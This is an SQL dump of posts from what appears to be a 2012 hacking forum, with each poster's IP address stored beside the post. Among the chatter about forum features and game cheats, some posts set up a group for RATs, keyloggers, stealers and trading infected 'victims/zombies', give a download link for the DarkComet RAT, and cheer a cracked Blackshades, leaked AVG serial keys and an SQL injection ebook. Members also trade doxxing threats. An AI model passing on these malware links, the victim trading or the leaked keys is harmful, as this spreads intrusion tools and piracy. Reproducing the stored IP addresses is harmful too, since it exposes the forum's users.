'178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '69d811685c73e4ccf5d57bd9fbf7c5cb', '0', '0'); INSERT INTO mybb_posts VALUES('4164', '800', '4159', '15', 'RE: Blackshades v5.3 Cracked By The Old Warrior', '0', '203', 'NeonLights', '1349902861', 'yea it does :D\r\npretty epic that theres no backdoor and no miner in it :D', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', '340c6e0d706a009032c2ad55e0228b0d', '0', '0'); INSERT INTO mybb_posts VALUES('4165', '789', '4106', '19', 'RE: ratters', '0', '203', 'NeonLights', '1349902945', 'lmao i posted them haha\nand darkcomet is what i used to use and its not LQ its pretty HQ for a free rat... thats been around for ever...', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', '8dcfef9693eabc60b2c07cb3a1a38735', '0', '0'); INSERT INTO mybb_posts VALUES('4065', '767', '4059', '74', 'RE: Do you cheat/hack games?', '0', '62', 'R?????zo?', '1349812301', '[quote=\'iTzIpod\' pid=\'4059\' dateline=\'1349810837\']\r\nDo \"Mods\" on Minecraft count as hacking?\r\n[/quote]\r\n\r\nprobably not, but makes the game easier in some way :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b9cdaf3645d371e5aedefd6776e28ac3', '0', '0'); INSERT INTO mybb_posts VALUES('4066', '747', '4063', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '246', 'The Anarchist', '1349812648', '[quote=\'R?????zo?\' pid=\'4063\' dateline=\'1349811863\']\n[quote=\'The Anarchist\' pid=\'4060\' dateline=\'1349810934\']\nWhat an asshole! He banned me and posted my DOX too!\n[/quote]\n\n\nwhy do you even bother to make 300 accounts and get banned all the time? \njust GTFO of this forum and get a life.\n[/quote]\n\nI made maybe 3-4. It takes me less than a minute. Don\'t flatter yourself.\n\nAs for posts? I\'ve spent maybe a total of 20-30 minutes posting here, mainly to highlight the owner\'s actions.\nIt doesn\'t take much time out of my day, and it\'s really not that much activity.', '177.142.119.28', '-1316063460', '0', '0', '246', '1349812677', '1', 'cfd53d7b9c8a7dbc39f29fdcba9a1bbf', '0', '1349812677'); INSERT INTO mybb_posts VALUES('4110', '789', '4106', '19', 'RE: ratters', '0', '203', 'NeonLights', '1349835665', 'DAM FUCKING RIGHT IT IS lol :P', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', '610285e691bc17dfab127582ee756920', '0', '0'); INSERT INTO mybb_posts VALUES('4109', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '222', 'Exposé', '1349835237', 'Yeh guys congratz. Let\'s make this an awesome community :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '85b2975394e7656a1e21b19494b51348', '0', '0'); INSERT INTO mybb_posts VALUES('4108', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '1', 't3h jok3r', '1349834528', 'Thread closed. New leader needs to open a new thread.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '865eb92606c5e5e6fa13d7403e8801bf', '0', '0'); INSERT INTO mybb_posts VALUES('4107', '789', '4106', '19', 'RE: ratters', '0', '100', '??zg???g????61', '1349833524', 'Fuck yes. This is going to be an awesome group.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'a3da5ab96a69979ad1aba72ad4c0926b', '0', '0'); INSERT INTO mybb_posts VALUES('4106', '789', '0', '19', '[Junk]ratters', '0', '203', 'NeonLights', '1349833034', '[align=center]Hey, neon here leader of ratters\r\njust wanted to say that this section is for blackhat\r\nactivity and threads/posts only!\r\n\r\nlike: rats/keyloggers/stealers...\r\n\r\nand victim/zombie selling/trading can be done in this section/group\r\n\r\nim looking forward to seeing u guys active in this section :)[/align]', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', '92ae48beb894e54a5f0448fcfa757c71', '0', '0'); INSERT INTO mybb_posts VALUES('4067', '785', '0', '49', 'Install Tapatalk?', '0', '222', 'Exposé', '1349813687', 'I\'m on my mobile device a lot and I think it would be easier if I could use Tapatalk to browse threads and stuff. Is there anyway we can get Tapatalk integrated pl0x?', '66.87.85.147', '1113019795', '1', '0', '0', '0', '1', 'a57fbdc32e1c6d45ef69e8a5acae5958', '0', '0'); INSERT INTO mybb_posts VALUES('4068', '778', '4022', '19', 'RE: Gigbucks to Fiverr method', '0', '53', 'sirchamp', '1349813700', 'Feck! I just bought that e-book of theodore bagwell on HF! Omg. Just wasted 5 dollars', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '45c6a7705925eb7ed20f29a59b11eee1', '0', '0'); INSERT INTO mybb_posts VALUES('4069', '738', '3760', '43', 'RE: [LEAK] AVG 2013 Serial Keys', '0', '100', '??zg???g????61', '1349813888', 'Thanks! :D I try to be HQ when posting.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '48415336cf18a9ba605405515d4ef38d', '0', '0'); INSERT INTO mybb_posts VALUES('4070', '785', '4067', '49', 'RE: Install Tapatalk?', '0', '62', 'R?????zo?', '1349818069', 'I would love this too actually.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '46563c2628d8d80a40101abadcd63c47', '0', '0'); INSERT INTO mybb_posts VALUES('4071', '778', '4022', '19', 'RE: Gigbucks to Fiverr method', '0', '62', 'R?????zo?', '1349818523', 'bad luck bro :(\nyou might get your 5 dollars back with this method though.', '94.132.244.168', '1585771688', '1', '0', '62', '1349818536', '1', '19f49513ed7533ab912a3c415058b62a', '0', '1349818536'); INSERT INTO mybb_posts VALUES('4158', '799', '0', '15', 'Darkcomet rat 5.4 Legacy Beta', '0', '203', 'NeonLights', '1349887269', '[align=center][img]http://img11.hostingpics.net/pics/155301Sanstitre.gif[/img]\n\nFor More Info Go to : http://www.darkcomet-rat.com/\n\n[lock]download: http://localhostr.com/xAr1dTD8JEm9[/lock]\n\nor download from original site enjoy![/align]', '205.237.34.10', '-840097270', '1', '0', '1', '1352010952', '1', 'f4217408d22060ac301b285149455c56', '0', '1352010952'); INSERT INTO mybb_posts VALUES('4160', '563', '2792', '25', 'RE: Virus Removal Tools', '0', '203', 'NeonLights', '1349887540', 'useless thread...\r\nwaste of time lmao why did u even spend time doing this?', '205.237.34.10', '-840097270', '1', '0', '0', '0', '1', 'ab44d9c0b14a19c7a56386081ecf5820', '0', '0'); INSERT INTO mybb_posts VALUES('4074', '785', '4067', '49', 'RE: Install Tapatalk?', '0', '61', 'NXK', '1349819910', 'Id like this also, It would be very nice :)', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '16dfc6ad60093e35701c5923d5a9094c', '0', '0'); INSERT INTO mybb_posts VALUES('4075', '783', '4054', '49', 'RE: Enable who\'s viewing thread....', '0', '61', 'NXK', '1349819941', 'You kind of can already, It displays what thread a user is looking at on there profile.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '975cf036c7c0b177393bf0974549e9c7', '0', '0'); INSERT INTO mybb_posts VALUES('4076', '594', '2868', '64', 'RE: Noobroom (Online Movie Streaming Site)', '0', '62', 'R?????zo?', '1349820655', 'nice share bro, too bad my internet connection sucks :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1c1191e706b4f8d10d0e9477d8e4974c', '0', '0'); INSERT INTO mybb_posts VALUES('4077', '783', '4054', '49', 'RE: Enable who\'s viewing thread....', '0', '3', '??????????¢™', '1349822208', 'Yes if you go to that users profile you can see next to where it says Online or Offline if its online it says the location they are so if they are viewing a thread it will say \"Viewing ........\" But if you are talkin about the feature where when you are on a thread it shows who is viewing that same thread on the top then that is useless. It will take up too much space and make it look tacky.', '75.38.19.52', '1260786484', '1', '0', '3', '1349822223', '1', '5b82cbd1657e9d7c25ddc6f7b27eb918', '0', '1349822223'); INSERT INTO mybb_posts VALUES('4078', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '3', '??????????¢™', '1349822503', 'Nice I will try this right now.\r\nEDIT: OMG This really works, Thanks\r\n2nd Edit: LMAO this is what I got \"Instructions\r\nThank you for purchasing my Ebay-Wallet 1.0 EBook.\r\nI uploaded the Instructions to uploadnsell and not the actual E-Book because i am aware that most of you know about the uploadnsell exploit.\r\nAnyway, now please just PM me your Transaction ID via a PM on HF or Contact me via Skype \"JayAargh\"\r\nI will reply to you shortly, Thank You :)\"\r\n\r\nDid anyone else get this?', '75.38.19.52', '1260786484', '1', '0', '3', '1349822640', '1', '09f4723b81684689a67aa9e3718f39bf', '0', '1349822640'); INSERT INTO mybb_posts VALUES('4079', '678', '3446', '29', 'RE: Get Free Domain names & Webhosting Packages e-Book [Written by me!]', '0', '3', '??????????¢™', '1349823195', 'Thanks for the E-Book but im not going to try it, too risky.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '4d76eae04096d672f5c2302385228be7', '0', '0'); INSERT INTO mybb_posts VALUES('4080', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '100', '??zg???g????61', '1349823708', 'Lol oh crap two of my friends have messaged me like that already. xD', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '329ff6557282b4bfe5987a84da547804', '0', '0'); INSERT INTO mybb_posts VALUES('4082', '738', '3760', '43', 'RE: [LEAK] AVG 2013 Serial Keys', '0', '3', '??????????¢™', '1349824153', 'Thanks for this, Keep it up', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '6012ffc8d48e7db53a6d995c64f4be18', '0', '0'); INSERT INTO mybb_posts VALUES('4083', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '246', 'The Anarchist', '1349824286', 'Honest to god, if he wants to use our forum, he\'s welcome to do so.\nI am not sure what I would \"use\" him for. It\'s just a forum, and I have no restrictions in place that would prevent him from doing so.', '177.142.119.28', '-1316063460', '0', '0', '0', '0', '1', '4d78a56d0cd6557c011214f8c70887b0', '0', '0'); INSERT INTO mybb_posts VALUES('4084', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '3', '??????????¢™', '1349824319', 'OMFG Anarchists you are a fucking skid and J0ker is a beast. You are just hating because we have more active members than your shitty as forum wiht the top poster of the day with 4 posts LMFAO.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '51d6430c6f5607c8c36962b07e8d66ed', '0', '0'); INSERT INTO mybb_posts VALUES('4085', '729', '4080', '7', 'RE: Skype Virus [MUST READ!]', '0', '3', '??????????¢™', '1349824404', '[quote=\'iTzGRONgamer61\' pid=\'4080\' dateline=\'1349823708\']\r\nLol oh crap two of my friends have messaged me like that already. xD\r\n[/quote]\r\n\r\nYea one of my friends messaged me the legit virus but it said error or something and it said Skype removed it and my other friend sent me something like the virus but it was a gay as pick of a dude showing is dick.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '678957c8cb7673d4ea0363963fe26564', '0', '0'); INSERT INTO mybb_posts VALUES('4086', '738', '3760', '43', 'RE: [LEAK] AVG 2013 Serial Keys', '0', '100', '??zg???g????61', '1349824446', 'Your welcome. You too buddy ;)', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', 'c2ce80c6474614726978f00f0e1463b3', '0', '0'); INSERT INTO mybb_posts VALUES('4087', '786', '0', '64', 'Awesome FREE site for watching latest anime and cartoons', '0', '100', '??zg???g????61', '1349824590', 'Hey guys, I just saw how much this section is lacking threads so, I thought I\'d share a website I use regularly for watching anime and other TV shows. The website is www.watchcartoononline.com and they offer anything from Deathnote to Family Guy.', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '06aaf89196d50ed20c8cbc73abe32741', '0', '0'); INSERT INTO mybb_posts VALUES('4088', '747', '4081', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '246', 'The Anarchist', '1349824722', '[quote=\'t3h jok3r\' pid=\'4081\' dateline=\'1349824131\']\r\n[quote=\'Ultimatum\' pid=\'4016\' dateline=\'1349764657\']\r\nWhat the fuck is this? [A.Forums] is absolute bull shit. Just cause you guys don\'t have anything I\'ve seen here, doesn\'t give an excuse for you fucktards to go bringing your shit here.\r\n\r\nThe fucking Anarchist kicked me from the forums for NO reason. At least t3h jok3r isn\'t an asshole.\r\n[/quote]\r\n\r\n1. \"*Chuckles* The shit is still down. But I\'ll see what I can make up the 18 bucks and the 2 bucks I still ow yah Maybe from the booter, hopefully.\"\r\n\r\n2. \"Got kicked out\" and your last post on AF was 8 hours this post? \r\n\r\n[quote=\'The Anarchist\' pid=\'4066\' dateline=\'1349812648\']\r\n[quote=\'R?????zo?\' pid=\'4063\' dateline=\'1349811863\']\r\n[quote=\'The Anarchist\' pid=\'4060\' dateline=\'1349810934\']\r\nWhat an asshole! He banned me and posted my DOX too!\r\n[/quote]\r\n\r\n\r\nwhy do you even bother to make 300 accounts and get banned all the time? \r\njust GTFO of this forum and get a life.\r\n[/quote]\r\n\r\nI made maybe 3-4. It takes me less than a minute. Don\'t flatter yourself.\r\n\r\nAs for posts? I\'ve spent maybe a total of 20-30 minutes posting here, mainly to highlight the owner\'s actions.\r\nIt doesn\'t take much time out of my day, and it\'s really not that much activity.\r\n[/quote]\r\n\r\n\r\nThis clearly shows that you are immature and have no life. If I posted your DOX online then firstly prove it that it\'s online and secondly prove it that I posted it.\r\n[/quote]\r\n\r\nI think you missed the fact he was joking. :roflol:\r\n\r\nAs I said, don\'t flatter yourself. It only takes about 45 seconds to type a post like this. And why don\'t you post my DOX? You keep saying that you will, yet I am still waiting. It seems like that\'s all you can threaten. \r\nI honestly have no issues with people knowing who I am, after all, they are on my site. If people want to send me blow-up dolls or SWAT me, I invite them to. I will be surprised if the postal worker doesn\'t steal them.\r\n\r\nIf you\'re going to make pathetic threats, follow through. It seems like you\'re all saddle and no horse.\n[hr]\n[quote=\'??????????¢™\' pid=\'4084\' dateline=\'1349824319\']\nOMFG Anarchists you are a fucking skid and J0ker is a beast. You are just hating because we have more active members than your shitty as forum wiht the top poster of the day with 4 posts LMFAO.\n[/quote]\n\nOur top poster has 20 posts, actually.', '177.142.119.28', '-1316063460', '0', '0', '246', '1349824792', '1', '114088f08545073211f6ac7b488c66e1', '0', '0'); INSERT INTO mybb_posts VALUES('4089', '786', '4087', '64', 'RE: Awesome FREE site for watching latest anime and cartoons', '0', '62', 'R?????zo?', '1349824900', 'thanks for this bro, nice post :D', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'aa81f1535922df6d5d7c9971b17b85b0', '0', '0'); INSERT INTO mybb_posts VALUES('4090', '786', '4087', '64', 'RE: Awesome FREE site for watching latest anime and cartoons', '0', '100', '??zg???g????61', '1349825769', 'No problem ;D love to contribute', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '47bedb51736f0b8d05b5bd90ef5d461f', '0', '0'); INSERT INTO mybb_posts VALUES('4091', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '222', 'Exposé', '1349825824', 'That is why you don\'t download random programs on the web. Half of the time they aren\'t what they say they are', '66.87.85.147', '1113019795', '1', '0', '0', '0', '1', '671c33e8837dcd584f7d9af0a979562c', '0', '0'); INSERT INTO mybb_posts VALUES('4092', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '222', 'Exposé', '1349825983', 'Thanks for letting me join. Hopefully I can bring some good shit to the group :)', '66.87.85.147', '1113019795', '1', '0', '0', '0', '1', 'b5f6c7770f7f09dac4228ff7a5ac5e2e', '0', '0'); INSERT INTO mybb_posts VALUES('4093', '785', '4067', '49', 'RE: Install Tapatalk?', '0', '222', 'Exposé', '1349826240', 'Yeh right :). It\'s easy to I stall so hopefully we can get it :)', '66.87.85.147', '1113019795', '1', '0', '0', '0', '1', '43420655ee44d8f140f4d0618ae1f2f9', '0', '0'); INSERT INTO mybb_posts VALUES('4094', '783', '4054', '49', 'RE: Enable who\'s viewing thread....', '0', '222', 'Exposé', '1349826288', 'I\'m pretty sure it can go at the bottom but alright. It was just an idea :P', '66.87.85.147', '1113019795', '1', '0', '0', '0', '1', '930dff73d2a68cc9aa01c1cfba425645', '0', '0'); INSERT INTO mybb_posts VALUES('4095', '729', '4091', '7', 'RE: Skype Virus [MUST READ!]', '0', '3', '??????????¢™', '1349827057', '[quote=\'ƒ???????????g\' pid=\'4091\' dateline=\'1349825824\']\r\nThat is why you don\'t download random programs on the web. Half of the time they aren\'t what they say they are\r\n[/quote]\r\n\r\nYea that is definitely right, it was a good thing that I knew about the virus or I would have clicked the link.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '579fa42f5775e993cb0a58fa9059c580', '0', '0'); INSERT INTO mybb_posts VALUES('4096', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '203', 'NeonLights', '1349828054', 'OMFG LOL MY CUZIN GOT THIS ON HES COMP i fixed for him within 2 secs lmao', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', '51c04b0f5ece345b1d0b1966c2a4ee05', '0', '0'); INSERT INTO mybb_posts VALUES('4097', '787', '0', '75', 'Saints Row The Third Cheats + More!', '0', '194', 'Slender Man', '1349828988', '[align=center][img]http://www.gamepur.com/files/images/2011/saints-row-the-third.jpg[/img][/align]\r\n\r\n[align=center][color=#9400D3]Cheat mode\r\nPress Back to use the phone, and select the \"Extras\" option, then choose the \"Cheats\" selection. Enter one of the following codes to activate the corresponding cheat function. Note: Achievements and auto save are disabled when cheats are activated. However, you are still allowed to manually save while cheats are enabled.\r\nResult Code\r\n \r\nPlayer Ability \r\nMoney ($100,000) cheese\r\nWeapons letsrock\r\nGolden Gun (one-hit kills) goldengun\r\nInfinite sprint runfast\r\nNo vehicle damage vroom\r\nRepair car repaircar\r\nAdd respect whatitmeanstome\r\nAdd police notoriety pissoffpigs\r\nNo police notoriety goodygoody\r\nAdd gang notoriety lolz\r\nNo gang notoriety oops\r\n \r\nVehicles \r\nSpawn Ambulance giveembulance\r\nSpawn Anchor giveanchor\r\nSpawn Attrazione giveattrazione\r\nSpawn Bootlegger givebootlegger\r\nSpawn Challenger givechallenger\r\nSpawn Commander givecommander\r\nSpawn Condor givecondor\r\nSpawn Eagle giveeagle\r\nSpawn Estrada giveestrada\r\nSpawn F69 Vtol givevtol\r\nSpawn Gatmobile givegatmobile\r\nSpawn Kanada givekanada\r\nSpawn Kenshin givekenshin\r\nSpawn Knoxville giveknoxville\r\nSpawn Krukov givekrukov\r\nSpawn Miami givemiami\r\nSpawn Municipal givemunicipal\r\nSpawn Nforcer givenforcer\r\nSpawn Peacemaker givepeacemaker\r\nSpawn Phoenix givephoenix\r\nSpawn Quasar givequasar\r\nSpawn Reaper givereaper\r\nSpawn Sandstorm givesandstorm\r\nSpawn Shark giveshark\r\nSpawn Specter givespecter\r\nSpawn Squasar givesquasar\r\nSpawn Status Quo givestatusquo\r\nSpawn Taxi givetaxi\r\nSpawn Titan givetitan\r\nSpawn Toad givetoad\r\nSpawn Tornado givetornado\r\nSpawn Vortex givevortex\r\nSpawn VTOL givevtol\r\nSpawn Vulture givevulture\r\nSpawn Widowmaker givewidowmaker\r\nSpawn Woodpecker givewoodpecker\r\n \r\nWeapons \r\nSpawn 45 Sheperd givesheperd\r\nSpawn Apocafists giveapoca\r\nSpawn AR 55 givear55\r\nSpawn AS3 Ultimax giveultimax\r\nSpawn Baseball Bat givebaseball\r\nSpawn Chainsaw givechainsaw\r\nSpawn Cyber Blaster givecybersmg\r\nSpawn Cyber Buster givecyber\r\nSpawn D4TH Blossom giveblossom\r\nSpawn Electric Grenade giveelectric\r\nSpawn Flamethrower giveflamethrower\r\nSpawn Flash Bang giveflashbang\r\nSpawn Grave Digger givedigger\r\nSpawn Grenade givegrenade\r\nSpawn K-8 Krukov givekrukov\r\nSpawn KA-1 Kobra givekobra\r\nSpawn M2 Grenade Launcher givelauncher\r\nSpawn McManus 2015 givesniper\r\nSpawn Mini Gun giveminigun\r\nSpawn Molotov givemolotov\r\nSpawn Nocturne givesword\r\nSpawn RC Possesor givecgun\r\nSpawn Reaper Drone givedrone\r\nSpawn Riot Shield giveshield\r\nSpawn RPG Launcher giverpg\r\nSpawn S3X Hammer givehammer\r\nSpawn SA-3 Airstrike giveairstrike\r\nSpawn Satchel Charge givesatchel\r\nSpawn Shock Hammer giverocket\r\nSpawn Sonic Boom givesonic\r\nSpawn Stun Gun givestungun\r\nSpawn TEK Z-10 givetek\r\nSpawn The Penetrator givedildo\r\nSpawn Viper Laser Rifle giveslm8\r\n \r\nWeather \r\nSunny weather clearskies\r\nCloudy weather overcast\r\nRainy weather lightrain\r\nVery rainy weather heavyrain\r\n \r\nWorld \r\nAdvance time ticktock\r\nBloody Mess notrated\r\nHeaven Bound (corpses rise into the air) fryhole\r\nVehicle Smash isquishyou\r\nDrunk (drunk pedestrians) dui\r\nMascots (mascot pedestrians) mascot\r\nPimps and Hos (pimps and prostitutes pedestrians) hohoho\r\nZombies (zombie pedestrians) brains\r\nCustomizing any vehicle\r\nTo customize any non-customizable vehicle, take any customizable vehicle into Rim Jobs, and press Y. Go to \"Garage\" in the menu, and highlight a vehicle that is not customizable from your list, but do not press the button to retrieve it. Instead, press B to back out of the menu, and then select \"Accept\" to confirm the exit. It will now take you directly to the customizing menu.\r\n\r\n \r\nEasy money\r\nThere are at least four barnstorming areas at the airport, one at the end of each runway where you have to stay in-between the runway approach light towers. You will get $5,108 for each pass with the longest at 446 feet. Each pass takes approximately 5 seconds in a helicopter, and another 10 to 20 seconds to line up again. You can easily get $100,000 in under 20 minutes. Repeat this as many times as desired.\r\nFinding the Eagle (Attack version)\r\nThe special Attack version of the Eagle helicopter has dual pilot guided mini-guns and rocket pods. It can only be found on Armory Island at the southeast helipad (not the one on the roof). You must approach it from on the ground or be on the ground for a minute or two to get it to appear.\r\nEaster Bunny\r\nGo to Luchadores\' territory, and proceed to the lower left part of the map to find some boats. Get on the second boat to find a gang operation with a giant bunny caught in fishing nets.\r\nProfessor Genki\r\nAn NPC wearing a Professor Genki costume will appear at random in Steelport as an enemy on the radar. If you kill him, you will get approximately $300,000. Note: He has a very large amount of health and is armed with a stun gun.\r\nShaundi in magazine\r\nUnlock Burns Hill Reactor as a crib, then go upstairs to the bathroom. Inside is a magazine on the edge of the Jacuzzi titled \"Boy-Toy\". The magazine\'s cover features Shaundi as she appeared in Playboy magazine\'s \"2008 Virtual Vixens\".\r\nThe Punisher reference\r\nOnce Kinzie Kensington\'s hideout is unlocked, go upstairs, and enter the room with all the computers in it. Then, zoom in on the ceiling with a sniper rifle to see a cluster of newspapers. They are all newspaper clippings from Volition\'s The Punisher game.\r\nSaints Row references\r\nGo to Kinzie Kensington\'s crib, then go upstairs. Go to the very back to find a room with newspaper clippings taped all over the wall. Look at the headlines to see references to Saints Row and Saints Row 2. There is one with a headline about a zombie attack with the map of Stillwater filled with red dots marking the spread of the outbreak.\r\nAvatar Awards\r\nSuccessfully complete the indicated task to unlock the corresponding Avatar Award:\r\nOversized Gas Mask: Successfully complete the \"When Good Heists...\" mission.\r\nSaints Logo Shirt: Get the \"Flash The Pan\" achievement.\r\nSR:TT Logo Shirt: Create and upload your first character to the community site.[/align][/color]', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '02552884173c4c468bf8536462bdf677', '0', '0'); INSERT INTO mybb_posts VALUES('4098', '785', '4067', '49', 'RE: Install Tapatalk?', '0', '1', 't3h jok3r', '1349829302', 'I tried installing it today but it threw me an error so I\'ll keep this thread opened for more updates.', '173.245.64.218', '-1376436006', '1', '0', '0', '0', '1', '0e309088e89419deff17bb5f799e843d', '0', '0'); INSERT INTO mybb_posts VALUES('4099', '788', '0', '3', '4000 POSTS YEAH BABY!', '0', '1', 't3h jok3r', '1349829429', 'L33THacking reached 4,000 posts today. I will update this thread with a screenshot of the stats. Thanks a lot to everyone for contributing and L33THacking is grateful to all those who left L33THacking and played a role reaching 4K posts.\n\n[b]Edited[/b]\n\n[img]http://imageshack.us/a/img31/1636/statsue.png[/img]', '173.245.64.218', '-1376436006', '1', '0', '1', '1349829541', '1', 'e5d61c1b9c9a2c3c87c1f678eaadd2d8', '0', '1349829541'); INSERT INTO mybb_posts VALUES('4100', '783', '4054', '49', 'RE: Enable who\'s viewing thread....', '0', '1', 't3h jok3r', '1349830062', 'Well I agree with IP and Flame. \n\nIt will take up space, revealing privacy but at the same time fun to see who is viewing which thread.', '173.245.64.218', '-1376436006', '1', '0', '0', '0', '1', '0ef0b0c79462064db4390b1d61111679', '0', '0'); INSERT INTO mybb_posts VALUES('4101', '212', '4056', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1349830179', '[quote=\'iTzIpod\' pid=\'4056\' dateline=\'1349810696\']\r\nWarnings don\'t do anything. Nothing happens when you get 100%..\r\n[/quote]\r\n\r\nOn this site you get banned for 6 months.', '173.245.64.218', '-1376436006', '1', '0', '0', '0', '1', '0b26b7803267804b37ec733aedc480af', '0', '0'); INSERT INTO mybb_posts VALUES('4102', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '62', 'R?????zo?', '1349830594', 'You are welcome bro, stay active :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '221e45f160e3cf33854f1270bf61eec8', '0', '0'); INSERT INTO mybb_posts VALUES('4103', '785', '4067', '49', 'RE: Install Tapatalk?', '0', '62', 'R?????zo?', '1349830625', 'okay cool, will be awesome if we get this :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'dcd0f911d51a557830a6a46d29511416', '0', '0'); INSERT INTO mybb_posts VALUES('4104', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '62', 'R?????zo?', '1349830684', 'congrats LH!\nand thanks everyone to everyone who posted, every single post counts :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'cae26849bb05688f57e80624e7de6ca1', '0', '0'); INSERT INTO mybb_posts VALUES('4105', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1349831174', 'Ratters group added. The next group will be the last group for a while. I don\'t want too many groups.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c645a3b503d6f73c34b0797bfe5df99d', '0', '0'); INSERT INTO mybb_posts VALUES('4111', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '61', 'NXK', '1349836812', 'Congrats to Us! This is awesome And I love this community!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1c8a4b4cafb626ee5c44c2e50029332b', '0', '0'); INSERT INTO mybb_posts VALUES('4112', '778', '4022', '19', '[Junk]Gigbucks to Fiverr method', '0', '1', 't3h jok3r', '1349837710', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('4113', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '205', 'mothered', '1349841999', 'A great achievement Indeed.\r\n\r\nIt wasn\'t too long ago, when we were at 2,700 posts. Now 4k :)\r\nLet\'s keep up the good work.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '3a745e01b934e09140a0f53facde114a', '0', '0'); INSERT INTO mybb_posts VALUES('4114', '786', '4087', '64', 'RE: Awesome FREE site for watching latest anime and cartoons', '0', '205', 'mothered', '1349842085', 'I haven\'t come across this site before, so I\'ll certainly check It out.\r\n\r\nMany thanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '835017bd3cbc37df725278cb8ad75e71', '0', '0'); INSERT INTO mybb_posts VALUES('4115', '726', '3653', '13', 'RE: Dorks', '0', '205', 'mothered', '1349842227', 'Awesome, just what I was looking for.\r\n\r\nAppreciated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd6d7c2eacd96981c8eb0acef264391aa', '0', '0'); INSERT INTO mybb_posts VALUES('4116', '712', '3639', '13', 'RE: SQL Injection Ebook', '0', '205', 'mothered', '1349842309', 'Hitting the download right now.\r\n\r\nCheers mate, thanks :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '8d897de96cb9907cc5b79eeef2b4a5ce', '0', '0'); INSERT INTO mybb_posts VALUES('4117', '786', '4087', '64', 'RE: Awesome FREE site for watching latest anime and cartoons', '0', '2', 'Apathy', '1349842404', 'Thanks I will check it out tomorrow.', '173.206.130.147', '-1378975085', '0', '0', '0', '0', '1', '93c69ac5e1511df966898725a05b2c41', '0', '0'); INSERT INTO mybb_posts VALUES('4118', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '2', 'Apathy', '1349842440', 'Very nce achievement cannot wait for 5kz :)', '173.206.130.147', '-1378975085', '0', '0', '0', '0', '1', '42b8494b117293603cc1199f020465ad', '0', '0'); INSERT INTO mybb_posts VALUES('4119', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '3', '??????????¢™', '1349842486', 'Yep this is all because of all the great HQ, Active members that we have here. Thanks to everyone except Anarchists.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '25ab8df1f701bcfb951bb8851c89a222', '0', '0'); INSERT INTO mybb_posts VALUES('4120', '702', '3593', '35', 'RE: You guys like my new userbar?', '0', '205', 'mothered', '1349842517', 'It\'s certainly different, and must say that I do like It.\r\n\r\nGood work mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '534cd1dadd609c9c395007efa8762cee', '0', '0'); INSERT INTO mybb_posts VALUES('4121', '729', '4096', '7', 'RE: Skype Virus [MUST READ!]', '0', '3', '??????????¢™', '1349842538', '[quote=\'NeonLights\' pid=\'4096\' dateline=\'1349828054\']\r\nOMFG LOL MY CUZIN GOT THIS ON HES COMP i fixed for him within 2 secs lmao\r\n[/quote]\r\n\r\nIts a good thing your cousin has a cousin that knows alot about PC\'s', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'ac9732a143ab4c2a1ac2308e3190bdc4', '0', '0'); INSERT INTO mybb_posts VALUES('4122', '788', '4119', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '1', 't3h jok3r', '1349843007', '[quote=\'??????????¢™\' 